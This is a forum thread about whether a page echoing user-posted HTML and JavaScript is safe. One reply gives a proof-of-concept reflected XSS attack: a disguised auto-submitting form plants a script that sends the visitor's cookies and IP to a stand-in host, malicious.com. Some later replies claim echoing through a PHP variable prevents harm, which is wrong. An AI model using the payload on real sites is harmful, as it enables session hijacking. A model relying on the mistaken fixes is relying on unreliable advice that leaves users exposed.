I made a script which allows users to test html and javascript code. Yes it is very simple. It just uses post data and then shows the post data on the page, it does not even save this data. I was wondering if this was a dangerous code for my site security though and wondered if hackers could use this to their benefit. I was wondering what they could do at worst and if I should upload this code to my site or not.
Thanks in advance.
Ehm...as long as it is neither stored nor shown to any other users it should be perfectly safe...
| dbdb wrote: |
I made a script which allows users to test html and javascript code. Yes it is very simple. It just uses post data and then shows the post data on the page, it does not even save this data. I was wondering if this was a dangerous code for my site security though and wondered if hackers could use this to their benefit. I was wondering what they could do at worst and if I should upload this code to my site or not.
Thanks in advance. |
Well... A malicious person can use it to steal the all cookies an user has from your site. | MrBlueSky wrote: |
| dbdb wrote: | I made a script which allows users to test html and javascript code. Yes it is very simple. It just uses post data and then shows the post data on the page, it does not even save this data. I was wondering if this was a dangerous code for my site security though and wondered if hackers could use this to their benefit. I was wondering what they could do at worst and if I should upload this code to my site or not.
Thanks in advance. |
Well... A malicious person can use it to steal the all cookies an user has from your site. |
No...that would only be if the input was display to other users surelyProof of Concept:
A malicious person does something like this:
| Code: |
<script type="text/javascript">
str = escape('<script type="text/javascript">location.href="http://malicious.com/savecookie.php?cookies="+encodeURI(document.cookie);+"&ip=<?php echo $_SERVER['REMOTE_ADDR']; ?>"</script>');
document.form1.malcode.value = str;
</script>
<form method="POST" name="form1" action="http://yoursite.com/testhtml.php">
<INPUT type="hidden" name="malcode">
<a href="www.freepr0n.com" onclick="javascript:document.form1.submit()">Get free pr0n</a>
</form>
|
When he posts this on a (his) webpage, he gets the cookies for yoursite.com together with the users ip when the user clicks on the link.
Whether you should worry about this happening is up to you. It isn't very likely when your site is small and/or not interesting for scriptkiddies. | MrBlueSky wrote: |
Proof of Concept:
A malicious person does something like this:
| Code: |
<script type="text/javascript">
str = escape('<script type="text/javascript">location.href="http://malicious.com/savecookie.php?cookies="+encodeURI(document.cookie);+"&ip=<?php echo $_SERVER['REMOTE_ADDR']; ?>"</script>');
document.form1.malcode.value = str;
</script>
<form method="POST" name="form1" action="http://yoursite.com/testhtml.php">
<INPUT type="hidden" name="malcode">
<a href="www.freepr0n.com" onclick="javascript:document.form1.submit()">Get free pr0n</a>
</form>
|
When he posts this on a (his) webpage, he gets the cookies for yoursite.com together with the users ip when the user clicks on the link.
Whether you should worry about this happening is up to you. It isn't very likely when your site is small and/or not interesting for scriptkiddies. |
Well...that depends whether the output is parsed by php.
if he uses something like the following:
| Code: |
| <?php echo $_POST['message']; ?> |
...then that wouldn't be a problem at all as the message isn't parsed by php...and the $_SERVER stuff therefor isn't available. | LukeakaDanish wrote: |
Well...that depends whether the output is parsed by php.
if he uses something like the following:
| Code: | | <?php echo $_POST['message']; ?> |
...then that wouldn't be a problem at all as the message isn't parsed by php...and the $_SERVER stuff therefor isn't available. |
The PHP is executed on malicious.com, so the IP is included in the Javascript send to the test page at yoursite.com (which happily sends it back to malicious.com together with the cookies). So that doesn't matter.So tell me if I have this right. The user has to click this link on mysite. So the only way that they can do that is if the link is if they type the code themselves, which is pointless.
Or is it you click the link on the malicious site which then redirects to the page with the link on it, and it depends on the user clicking it.
I don't really understand javascript. Sorry.
| dbdb wrote: |
Or is it you click the link on the malicious site which then redirects to the page with the link on it, and it depends on the user clicking it.
|
That's it exactly.You don't even have to give a link : you could submit automatically the form, with no actions from the user (because unsecure browsers don't warm users when a form is submit)
i think you should put a image varification before letting anybody submit your form, so that no hitrobot, or any type of malicious program try to misuse your form.
Perhaps you should prevent the user from executing any PHP code 
If you're note sure, you could do it like this:
| Code: |
<?php
$submittedText = $_POST['submittedText'];
echo $submittedText;
?> |
Doing it this way will stop your code from being executed - it simply saves it to a temporary variable, then prints it out.
Good luck It shouldn't do any damage. If you decided to store the information in a database, a hacker might be able to get at it, though.
